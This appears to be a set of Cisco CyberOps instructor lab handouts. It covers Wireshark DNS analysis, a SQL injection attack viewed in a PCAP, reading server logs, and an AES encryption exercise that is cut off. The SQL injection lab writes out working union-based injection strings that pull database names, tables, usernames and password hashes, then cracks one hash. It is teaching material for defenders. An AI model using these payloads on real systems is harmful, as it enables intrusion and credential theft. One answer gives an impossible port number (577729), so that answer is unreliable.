h. Keep the default settings on the Choose Components window and click Next.

i. Choose your desired shortcut options and click Next.

j. You can change the installation location of Wireshark, but unless you have limited disk space, it is
recommended that you keep the default location. Click Next to continue.
k. To capture live network data, WinPcap must be installed on your PC. If WinPcap is already installed on
your PC, the Install check box will be unchecked. If your installed version of WinPcap is older than the
version that comes with Wireshark, it is recommended that you allow the newer version to be installed by
clicking the Install WinPcap x.x.x (version number) check box.
Finish the WinPcap Setup Wizard if installing WinPcap and accept the license agreement if necessary.
Click Next to continue.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 12 www.netacad.com
Lab – Exploring DNS Traffic

l. Do NOT install USBPcap for normal traffic capture. Do NOT select the checkbox to install USBPcap.
USBPcap is experimental, and it could cause USB problems on your PC. Click Install to continue.

m. Wireshark starts installing its files and a separate window displays with the status of the installation. Click
Next when the installation is complete.
n. Click Finish to complete the Wireshark install process. Reboot the computer if necessary.

Step 2: Capture DNS traffic.

a. Click Start and search for Wireshark. Open Wireshark and start a Wireshark capture by double clicking
a network interface with traffic. In this example, Ethernet is the network interface with traffic.

b. Click Start and search for Command Prompt. Open Command Prompt.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 12 www.netacad.com
Lab – Exploring DNS Traffic

c. In the Command Prompt, type ipconfig /flushdns and press Enter to clear the DNS cache.

d. Type nslookup and press Enter to enter the interactive mode.

e. Enter the domain name of a website. The domain name www.cisco.com is used in this example.

f. Type exit when finished. Close the command prompt.

g. Click Stop capturing packets to stop the Wireshark capture.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 12 www.netacad.com
Lab – Exploring DNS Traffic

Part 2: Explore DNS Query Traffic

a. Observe the traffic captured in the Wireshark Packet List pane. Enter udp.port == 53 in the filter box and
click the arrow (or press enter) to display only DNS packets.

b. Select the DNS packet labeled Standard query 0x0002 A www.cisco.com.

c. In the Packet Details pane, notice this packet has Ethernet II, Internet Protocol Version 4, User Datagram
Protocol and Domain Name System (query).
d. Expand Ethernet II to view the details. Observe the source and destination fields.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 12 www.netacad.com
Lab – Exploring DNS Traffic

What are the source and destination MAC addresses? Which network interfaces are these MAC
addresses associated with?
____________________________________________________________________________________
____________________________________________________________________________________
In this example, the source MAC address is associated with the NIC on the PC and the destination MAC
address is associated with the default gateway. If there is a local DNS server, the destination MAC
address would be the MAC address of the local DNS server.
e. Expand Internet Protocol Version 4. Observe the source and destination IPv4 addresses.

What are the source and destination IP addresses? Which network interfaces are these IP addresses
associated with?
____________________________________________________________________________________
____________________________________________________________________________________
In this example, the source IP address is associated with the NIC on the PC and the destination IP
address is associated with the default gateway.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 12 www.netacad.com
Lab – Exploring DNS Traffic

f. Expand the User Datagram Protocol. Observe the source and destination ports.

What are the source and destination ports? What is the default DNS port number?
____________________________________________________________________________________
____________________________________________________________________________________
The source port number is 577729 and the destination port is 53, which is the default DNS port number.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 12 www.netacad.com
Lab – Exploring DNS Traffic

g. Open a Command Prompt and enter arp –a and ipconfig /all to record the MAC and IP addresses of the
PC.

Compare the MAC and IP addresses in the Wireshark results to the results from the ipconfig /all results.
What is your observation?
____________________________________________________________________________________
____________________________________________________________________________________
The IP and MAC addresses captured in the Wireshark results are the same as the addresses listed in
ipconfig /all command.
h. Expand Domain Name System (query) in the Packet Details pane. Then expand the Flags and
Queries.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 12 www.netacad.com
Lab – Exploring DNS Traffic

i. Observe the results. The flag is set to do the query recursively to query for the IP address to
www.cisco.com.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 12 www.netacad.com
Lab – Exploring DNS Traffic

Part 3: Explore DNS Response Traffic

a. Select the corresponding response DNS packet labeled Standard query response 0x000# A
www.cisco.com.

What are the source and destination MAC and IP addresses and port numbers? How do they compare to
the addresses in the DNS query packets?
____________________________________________________________________________________
____________________________________________________________________________________
The source IP, MAC address, and port number in the query packet are now destination addresses. The
destination IP, MAC address, and port number in the query packet are now source addresses.
b. Expand Domain Name System (response). Then expand the Flags, Queries, and Answers.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 12 www.netacad.com
Lab – Exploring DNS Traffic

c. Observe the results. Can the DNS server do recursive queries? _________________________________
Yes, the DNS can handle recursive queries.

d. Observe the CNAME and A records in the Answers details. How do the results compare to nslookup
results?
____________________________________________________________________________________
The results in the Wireshark should be the same as the results from nslookup in the Command Prompt.

Reflection
1. From the Wireshark results, what else can you learn about the network when you remove the filter?
_______________________________________________________________________________________
_______________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 11 of 12 www.netacad.com
Lab – Exploring DNS Traffic

Without the filters, the results display other packets, such as DHCP and ARP. From these packets and the
information contained within these packets, you can learn about other devices and their functions within the
LAN.
2. How can an attacker use Wireshark to compromise your network security?
_______________________________________________________________________________________
_______________________________________________________________________________________
An attacker on the LAN can use Wireshark to observe the network traffic and can get sensitive information in
the packet details if the traffic is not encrypted.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 12 of 12 www.netacad.com
Lab – Attacking a mySQL Database (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will view a PCAP file from a previous attack against a SQL database.

Background / Scenario
SQL injection attacks allow malicious hackers to type SQL statements in a web site and receive a response
from the database. This allows attackers to tamper with current data in the database, spoof identities, and
miscellaneous mischief.
A PCAP file has been created for you to view a previous attack against a SQL database. In this lab, you will
view the SQL database attacks and answer the questions.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Open the PCAP file and follow the SQL database attacker
You will use Wireshark, a common network packet analyzer, to analyze network traffic. After starting
Wireshark, you will open a previously saved network capture and view a step by step SQL injection attack
against a SQL database.

Step 1: Open Wireshark and load the PCAP file.

The Wireshark application can be opened using a variety of methods on a Linux workstation.
a. Start the CyberOps Workstation VM.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 18 www.netacad.com
Lab – Attacking a mySQL Database

b. Click on Applications > CyberOPS > Wireshark on the desktop and browse to the Wireshark
application.

c. In the Wireshark application, click Open in the middle of the application under Files.

d. Browse through the /home/analyst/ directory and search for lab.support.files. In the lab.support.files
directory and open the SQL_Lab.pcap file.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 18 www.netacad.com
Lab – Attacking a mySQL Database

e. The PCAP file opens within Wireshark and displays the captured network traffic. This capture file extends
over an 8-minute (441 second) period, the duration of this SQL injection attack.

What are the two IP addresses involved in this SQL injection attack based on the information displayed?
____________________________________________________________________________________
10.0.2.4 and 10.0.2.15

Step 2: View the SQL Injection Attack.

In this step, you will be viewing the beginning of an attack.
a. Within the Wireshark capture, right-click line 13 and select Follow HTTP Stream. Line 13 was chosen
because it is a GET HTTP request. This will be very helpful in following the data stream as the application
layers sees it and leads up to the query testing for the SQL injection.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 18 www.netacad.com
Lab – Attacking a mySQL Database

The source traffic is shown in red. The source has sent a GET request to host 10.0.2.15. In blue, the
destination device is responding back to the source.

b. Click Find and enter 1=1. Search for this entry. When the text is located, click Cancel in the Find text
search box. The string 1=1

c. The attacker has entered a query (1=1) into a UserID search box on the target 10.0.2.15 to see if the
application is vulnerable to SQL injection. Instead of the application responding with a login failure

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 18 www.netacad.com
Lab – Attacking a mySQL Database

message, it responded with a record from a database. The attacker has verified they can input an SQL
command and the database will respond. The search string 1=1 creates an SQL statement that will be
always true. In the example, it does not matter what is entered into the field, it will always be true.

d. Close the Follow HTTP Stream window.

e. Click Clear to display the entire Wireshark conversation.

Step 3: The SQL Injection Attack continues...

In this step, you will be viewing the continuation of an attack.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 18 www.netacad.com
Lab – Attacking a mySQL Database

a. Within the Wireshark capture, right-click line 19, and select Follow HTTP Stream.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 18 www.netacad.com
Lab – Attacking a mySQL Database

b. Click Find and enter 1=1. Search for this entry. When the text is located, click Cancel in the Find text
search box.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 18 www.netacad.com
Lab – Attacking a mySQL Database

c. The attacker has entered a query (1’ or 1=1 union select database(), user()#) into a UserID search box on
the target 10.0.2.15. Instead of the application responding with a login failure message, it responded with
the following information:

The database name is dvwa and the database user is dvwa@localhost. There are also multiple user
accounts being displayed.
d. Close the Follow HTTP Stream window.
e. Click “Clear” to display the entire Wireshark conversation.

Step 4: The SQL Injection Attack provides system information.

The attacker continues and starts targeting more specific information.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 18 www.netacad.com
Lab – Attacking a mySQL Database

a. Within the Wireshark capture, right-click line 22 and select Follow HTTP Stream. In red, the source traffic
is shown and is sending the GET request to host 10.0.2.15. In blue, the destination device is responding
back to the source.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 18 www.netacad.com
Lab – Attacking a mySQL Database

b. Click Find and type in 1=1. Search for this entry. When the text is located, click Cancel in the Find text
search box.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 18 www.netacad.com
Lab – Attacking a mySQL Database

c. The attacker has entered a query (1’ or 1=1 union select null, version ()#) into a UserID search box on the
target 10.0.2.15 to locate the version identifier. Notice how the version identifier is at the end of the output
right before the </pre>.</div> closing HTML code.

What is the version?

____________________________________________________________________________________
MySQL 5.7.12-0
d. Close the Follow HTTP Stream window.
e. Click Clear to display the entire Wireshark conversation.

Step 5: The SQL Injection Attack and Table Information.

The attacker knows that there is a large number of SQL tables that are full of information. The attacker
attempts to find them.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 11 of 18 www.netacad.com
Lab – Attacking a mySQL Database

a. Within the Wireshark capture, right-click on line 25 and select Follow HTTP Stream. The source is shown
in red. It has sent a GET request to host 10.0.2.15. In blue, the destination device is responding back to
the source.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 12 of 18 www.netacad.com
Lab – Attacking a mySQL Database

b. Click Find and enter users. Search for the entry displayed below. When the text is located, click Cancel
in the Find text search box.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 13 of 18 www.netacad.com
Lab – Attacking a mySQL Database

c. The attacker has entered a query (1’or 1=1 union select null, table_name from
information_schema.tables#) into a UserID search box on the target 10.0.2.15 to view all the tables in the
database. This provides a huge output of many tables, as the attacker specified “null” without any further
specifications.

What would the modified command of (1' OR 1=1 UNION SELECT null, column_name FROM
INFORMATION_SCHEMA.columns WHERE table_name='users') do for the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
The database would respond with a much shorter output filtered by the occurrence of the word “users”.
d. Close the Follow HTTP Stream window.
e. Click Clear to display the entire Wireshark conversation.

Step 6: The SQL Injection Attack Concludes.

The attack ends with the best prize of all; password hashes.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 14 of 18 www.netacad.com
Lab – Attacking a mySQL Database

a. Within the Wireshark capture, right-click line 28 and select Follow HTTP Stream. The source is shown in
red. It has sent a GET request to host 10.0.2.15. In blue, the destination device is responding back to the
source.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 15 of 18 www.netacad.com
Lab – Attacking a mySQL Database

b. Click Find and type in 1=1. Search for this entry. When the text is located, click Cancel in the Find text
search box.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 16 of 18 www.netacad.com
Lab – Attacking a mySQL Database

The attacker has entered a query (1’or 1=1 union select user, password from users#) into a UserID
search box on the target 10.0.2.15 to pull usernames and password hashes!

Which user has the password hash of 8d3533d75ae2c3966d7e0d4fcc69216b?

____________________________________________________________________________________
1337
Using a website such as https://crackstation.net/, copy the password hash into the password hash
cracker and get cracking.
What is the plain-text password?
____________________________________________________________________________________
____________________________________________________________________________________
charley
c. Close the Follow HTTP Stream window. Close any open windows.

Reflection
1. What is the risk of having platforms use the SQL langauge?
_______________________________________________________________________________________
_______________________________________________________________________________________
Web sites are commonly database driven and use the SQL language. The severity of a SQL injection attack
is up to the attacker.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 17 of 18 www.netacad.com
Lab – Attacking a mySQL Database

2. Browse the Internet and perform a search on “prevent SQL injection attacks”. What are 2 methods or steps
that can be taken to prevent SQL injection attacks?
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary, but should include:
Filter user input
Deploy a web application firewall
Disable unnecessary database features/capabilities
Monitor SQL statements
Use parameters with stored procedures
Use parameters with dynamic SQL

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 18 of 18 www.netacad.com
Lab – Reading Server Logs (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Reading Log Files with Cat, More, and Less
Part 2: Log Files and Syslog
Part 3: Log Files and Journalctl

Background / Scenario
Log files are an important tool for troubleshooting and monitoring. Different application generates different log
files, each one containing its own set of fields and information. While the field structure may change between
log files, the tools used to read them are mostly the same. In this lab, you will learn about common tools used
to read log file and practice using them.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Reading Log Files with Cat, More, Less, and Tail
Log files are files used to record specific events triggered by applications, services or the operating system
itself. Usually stored as plain-text, log files are an indispensable resource for troubleshooting.

Step 1: Opening Log Files.

Log files commonly contain plain-text information which can be viewed by practically any program able to
handle text (text editors, for example). However, because of convenience, usability, and speed, a few tools
are more commonly used than others. This section focuses on four command-line-based programs: cat,
more, less, and tail.
cat, derived from the word ‘concatenate’, is a UNIX, command-line-based tool used to read and display the
contents of a file on the screen. Because of its simplicity and it can open a text file and display it in a text-only
terminal, cat is widely used to this day.
a. Start the CyberOps Worstation VM and open a terminal window.
b. From the terminal window, issue the command below to display the contents of the logstash-tutorial.log
file, located in the /home/analyst/lab.support.files/ folder:
analyst@secOps ~$ cat /home/analyst/lab.support.files/logstash-tutorial.log
The contents of the file should scroll through the terminal window until the all contents have been
displayed.
What is a drawback of using cat with large text files?
____________________________________________________________________________________
____________________________________________________________________________________
The beginning of the file may get lost as cat doesn’t support page breaking.

© Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab – Reading Server Logs

Another popular tool for visualizing log files is more. Similar to cat, more is also a UNIX command-line-
based tool that can open a text-based file and display the file contents on the screen. The main difference
between cat and more is that more supports page breaks, allowing the user to view the contents of a file,
one page at a time. This can be done using the space bar to display the next page.
c. From the same terminal window, use the command below to display the contents of the logstash-
tutorial.log file again. This time using more:
analyst@secOps ~$ more /home/analyst/lab.support.files/logstash-tutorial.log
The contents of the file should scroll through the terminal window and stop when one page is displayed.
Press the space bar to advance to the next page. Press enter to display the next line of text.
What is the drawback of using more?
____________________________________________________________________________________
____________________________________________________________________________________
Depending on the terminal application in use, it may not be easy to display again pages that were already
displayed.
Building on the functionality of cat and more, the less tool allows the contents of a file to be displayed
page by page, while also allowing the user the choice of viewing previously displayed pages.
d. From the same terminal window, use less to display the contents the logstash-tutorial.log file again:
analyst@secOps ~$ less /home/analyst/lab.support.files/logstash-tutorial.log
The contents of the file should scroll through the terminal window and stop when one page is displayed.
Press the space bar to advance to the next page. Press enter to display the next line of text. Use the up
and down arrow keys to move back and forth through the text file.
Use the “q” key on your keyboard to exit the less tool.
e. The tail command displays the end of a text file. By default, tail displays the last ten lines of the file.
Use tail to display the last ten lines of the /home/analyst/lab.support.files/logstash-tutorial.log file.
analyst@secOps ~$ tail /home/analyst/lab.support.files/logstash-tutorial.log
218.30.103.62 - - [04/Jan/2015:05:28:43 +0000] "GET /blog/geekery/xvfb-firefox.html
HTTP/1.1" 200 10975 "-" "Sogou web
spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
218.30.103.62 - - [04/Jan/2015:05:29:06 +0000] "GET /blog/geekery/puppet-facts-into-
mcollective.html HTTP/1.1" 200 9872 "-" "Sogou web
spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
198.46.149.143 - - [04/Jan/2015:05:29:13 +0000] "GET /blog/geekery/disabling-battery-
in-ubuntu-
vms.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+semicomplete%2Fmai
n+%28semicomplete.com+-+Jordan+Sissel%29 HTTP/1.1" 200 9316 "-" "Tiny Tiny RSS/1.11
(http://tt-rss.org/)"
198.46.149.143 - - [04/Jan/2015:05:29:13 +0000] "GET /blog/geekery/solving-good-or-
bad-
problems.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+semicomplete%
2Fmain+%28semicomplete.com+-+Jordan+Sissel%29 HTTP/1.1" 200 10756 "-" "Tiny Tiny
RSS/1.11 (http://tt-rss.org/)"
218.30.103.62 - - [04/Jan/2015:05:29:26 +0000] "GET /blog/geekery/jquery-interface-
puffer.html%20target= HTTP/1.1" 200 202 "-" "Sogou web
spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
218.30.103.62 - - [04/Jan/2015:05:29:48 +0000] "GET /blog/geekery/ec2-reserved-vs-
ondemand.html HTTP/1.1" 200 11834 "-" "Sogou web
spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
66.249.73.135 - - [04/Jan/2015:05:30:06 +0000] "GET /blog/web/firefox-scrolling-
fix.html HTTP/1.1" 200 8956 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab – Reading Server Logs

AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25

(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.1.76.62 - - [04/Jan/2015:05:30:37 +0000] "GET /projects/xdotool/ HTTP/1.1" 200
12292 "http://www.haskell.org/haskellwiki/Xmonad/Frequently_asked_questions"
"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/24.0
Iceweasel/24.3.0"
86.1.76.62 - - [04/Jan/2015:05:30:37 +0000] "GET /reset.css HTTP/1.1" 200 1015
"http://www.semicomplete.com/projects/xdotool/" "Mozilla/5.0 (X11; Linux x86_64;
rv:24.0) Gecko/20140205 Firefox/24.0 Iceweasel/24.3.0"
86.1.76.62 - - [04/Jan/2015:05:30:37 +0000] "GET /style2.css HTTP/1.1" 200 4877
"http://www.semicomplete.com/projects/xdotool/" "Mozilla/5.0 (X11; Linux x86_64;
rv:24.0) Gecko/20140205 Firefox/24.0 Iceweasel/24.3.0"

Step 2: Actively Following Logs.

In some situations, it is desirable to monitor log files as log entries are written to the log files. For those cases,
the tail -f command is very helpful.
a. Use tail -f to actively monitor the contents of the /var/log/syslog file:
analyst@secOps ~$ sudo tail –f /home/analyst/lab.support.files/logstash-
tutorial.log
What is different in the output of tail and tail -f? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
After the tail -f command is issued, the terminal appears locked and does not accept commands
anymore. This happens because tail is still running, watching the log file and will print any changes written
to it on the screen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab – Reading Server Logs

b. To watch tail –f in action, open a second terminal window. Arrange your display so you can see both
terminal windows. Re-size the windows so you can see them both at the same, as shown in the image
below:

The terminal window on the top is running tail -f to monitor the

/home/analyst/lab.support.files/logstash-tutorial.log file. Use the terminal window on the bottom to
add information to the monitored file.
To make it easier to visualize, select the top terminal window (the one running tail -f) and press enter a
few times. This will add a few lines between the current contents of the file and the new information to be
added.
c. Select the bottom terminal window and enter the following command:
[analyst@secOps ~]$ echo "this is a new entry to the monitored log file" >>
lab.support.files/logstash-tutorial.log

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
Lab – Reading Server Logs

The command above appends the "this is a new entry to the monitored log file" message to the
/home/analyst/lab.support.files/logstash-tutorial.log file. Because tail –f is monitoring the file at the
moment a line is added to the file. The top window should display the new line in real-time.
d. Press CTRL + C to stop the execution of tail -f and return to the shell prompt.
e. Close one of the two terminal windows.

Part 2: Log Files and Syslog

Because of their importance, it is common practice to concentrate log files in one monitoring computer.
Syslog is a system designed to allow devices to send their log files to a centralized server, known as syslog
server. Clients communicate to a syslog server using the syslog protocol. Syslog is commonly deployed and
supports practically all computer platforms.
The CyberOps Worstation VM generates operating system level log files and hands them over to syslog.
a. Use the cat command as root to list the contents of the /var/log/syslog.1 file. This file holds the log
entries that are generated by the CyberOps Worstation VM operating system and sent to the syslog
service.
analyst@secOps ~$ sudo cat /var/log/syslog.1
[sudo] password for analyst:
Feb 7 13:23:15 secOps kernel: [ 5.458959] psmouse serio1: hgpk: ID: 10 00 64
Feb 7 13:23:15 secOps kernel: [ 5.467285] input: ImExPS/2 BYD TouchPad as
/devices/platform/i8042/serio1/input/input6
Feb 7 13:23:15 secOps kernel: [ 5.502469] RAPL PMU: API unit is 2^-32 Joules, 4
fixed counters, 10737418240 ms ovfl timer
Feb 7 13:23:15 secOps kernel: [ 5.502476] RAPL PMU: hw unit of domain pp0-core 2^-
0 Joules
Feb 7 13:23:15 secOps kernel: [ 5.502478] RAPL PMU: hw unit of domain package 2^-0
Joules
Feb 7 13:23:15 secOps kernel: [ 5.502479] RAPL PMU: hw unit of domain dram 2^-0
Joules
Feb 7 13:23:15 secOps kernel: [ 5.502480] RAPL PMU: hw unit of domain pp1-gpu 2^-0
Joules
Feb 7 13:23:15 secOps kernel: [ 5.672547] ppdev: user-space parallel port driver
Feb 7 13:23:15 secOps kernel: [ 5.709000] pcnet32 0000:00:03.0 enp0s3: renamed
from eth0
Feb 7 13:23:16 secOps kernel: [ 6.166738] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex
Feb 7 13:23:16 secOps kernel: [ 6.706058] random: crng init done
Feb 7 13:23:18 secOps kernel: [ 8.318984] floppy0: no floppy controllers found
Feb 7 13:23:18 secOps kernel: [ 8.319028] work still pending
Feb 7 14:26:35 secOps kernel: [ 3806.118242] hrtimer: interrupt took 4085149 ns
Feb 7 15:02:13 secOps kernel: [ 5943.582952] pcnet32 0000:00:03.0 enp0s3: link down
Feb 7 15:02:19 secOps kernel: [ 5949.556153] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex
Why did the cat command have to be executed as root?
____________________________________________________________________________________
____________________________________________________________________________________
In the CyberOps Worstation VM, the /var/log/syslog belongs to root and can only be read by root.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab – Reading Server Logs

b. Notice that the /var/log/syslog file only stores the most recent log entries. To keep the syslog file small,
the operating system periodically rotates the log files, renaming older log files as syslog.1, syslog.2, and
so on.
Use the cat command to list older syslog files:
analyst@secOps ~$ sudo cat /var/log/syslog.2
analyst@secOps ~$ sudo cat /var/log/syslog.3
analyst@secOps ~$ sudo cat /var/log/syslog.4
Can you think of a reason why it is so important to keep the time and date of computers correctly
synchronized?
____________________________________________________________________________________
____________________________________________________________________________________
Log systems use log files to record and store events and the date/time they took place. If the system
clock is incorrect or not synchronized, it will make the troubleshooting process more difficult.

Part 3: Log Files and Journalctl

Another popular log management system is known as journal. Managed by the journald daemon, the
system is designed to centralize the management of logs regardless of where the messages are originating.
In the context of this lab, the most evident feature of the journal system daemon is the use of append-only
binary files serving as its log files.

Step 1: Running journalctl with no options.

a. To look at the journald logs, use the journalctl command. The journalctl tool interprets and displays the
log entries previously stored in the journal binary log files.
analyst@secOps ~$ journalctl
-- Logs begin at Fri 2014-09-26 14:13:12 EDT, end at Tue 2017-02-07 13:23:29 ES
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Paths.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Paths.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Timers.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Timers.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Sockets.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Sockets.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Basic System.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Basic System.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Starting Default.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Reached target Default.
Sep 26 14:13:12 dataAnalyzer systemd[1087]: Startup finished in 18ms.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Default.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopped target Default.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Basic System.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopped target Basic System.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Paths.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopped target Paths.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Timers.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopped target Timers.
Sep 26 14:14:24 dataAnalyzer systemd[1087]: Stopping Sockets.
<output omitted>

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab – Reading Server Logs

Note: Running journalctl as root will display more detailed information.

b. Use CTRL+C to exit the display.

Step 2: Journalctl and a few options.

Part of the power of using journalctl lies in its options. For the following commands, use CRTL+C to exit
the display.
a. Use journalctl -utc to display all timestamps in UTC time:
analyst@secOps ~$ sudo journalctl –utc
b. Use journalctl -b to display log entries recorded during the last boot:
analyst@secOps ~$ sudo journalctl –b
Feb 07 08:23:13 secOps systemd-journald[172]: Time spent on flushing to /var is
Feb 07 08:23:13 secOps kernel: Linux version 4.8.12-2-ARCH (builduser@andyrtr)
Feb 07 08:23:13 secOps kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 fl
Feb 07 08:23:13 secOps kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE re
Feb 07 08:23:13 secOps kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX re
Feb 07 08:23:13 secOps kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]
Feb 07 08:23:13 secOps kernel: x86/fpu: Enabled xstate features 0x7, context si
Feb 07 08:23:13 secOps kernel: x86/fpu: Using 'eager' FPU context switches.
Feb 07 08:23:13 secOps kernel: e820: BIOS-provided physical RAM map:
<output omitted>
c. Use journalctl to specify the service and timeframe for log entries. The command below shows all nginx
service logs recorded today:
analyst@secOps ~$ sudo journalctl -u nginx.service --since today
d. Use the -k switch to display only messages generated by the kernel:
analyst@secOps ~$ sudo journalctl –k
e. Similar to tail -f described above, use the -f switch to actively follow the logs as they are being written:
analyst@secOps ~$ sudo journalctl –f

Reflection
Compare Syslog and Journald. What are the advantages and disadvantages of each?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Syslog is a standard solution for logging. It uses plaintext files but has a lack of structure. The information is
not centralized and it may be necessary to search through lots of unrelated information to find relevant
information. Syslog does not provide a way to separate messages by the related applications. Furthermore,
the plaintext files may require rotation to keep them from become too large. Journald replaced plaintext log
files with special file format for log messages. This makes it easier to find relevant log messages.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Class Activity – Creating Codes (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Secret codes have been used for thousands of years. Ancient Greeks and Spartans used a scytale (rhymes
with Italy) to encode messages. Romans used a Caesar cipher to encrypt messages. A few hundred years
ago, the French used the Vigenère cipher to encode messages. Today, there are many ways that messages
can be encoded.
In this lab, you will create and encrypt messages using online tools.

Background / Scenario
There are several encryption algorithms that can be used to encrypt and decrypt messages. Virtual Private
Networks (VPNs) are commonly used to automate the encryption and decryption process.
In this lab, you and a lab partner will use an online tool to encrypt and decrypt messages.

Required Resources
 PC with Internet access

Step 1: Search for an online encoding and decoding tool.

There are many different types of encryption algorithms used in modern networks. One of the most secure is
the Advanced Encryption Standard (AES) symmetric encryption algorithm. We will be using this algorithm in
our demonstration.
a. In a Web browser, search for “encrypt decrypt AES online”. Several different tools will be listed in the
search results.
b. Explore the different links provided and choose a tool. In our example, we used the tool available from:
http://aesencryption.net/

Step 2: Encrypt a message and email it to your lab partner.

In this step, each lab partner will encrypt a message and send the encrypted text to the other lab partner.
Note: Unencrypted messages are referred to as plaintext, while encrypted messages are referred to as
ciphertext.
a. Enter a plaintext message of your choice in the text box. The message can be very short or it can be
lengthy. Be sure that your lab partner does not see the plaintext message.
A secret key (i.e., password) is usually required to encrypt a message. The secret key is used along with
the encryption algorithm to encrypt the message. Only someone with knowledge of the secret key would
be able to decrypt the message.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 3 www.netacad.com
Class Activity – Creating Codes

b. Enter a secret key. Some tools may ask you to confirm the password. In our example, we used the
cyberops secret key.

c. Next click on Encrypt.

In the “Result of encryption in base64” window, random text is displayed. This is then encrypted
message.

d. Copy or Download the resulting message.

e. Email the encrypted message to your lab partner.

Step 3: Decrypt the ciphertext.

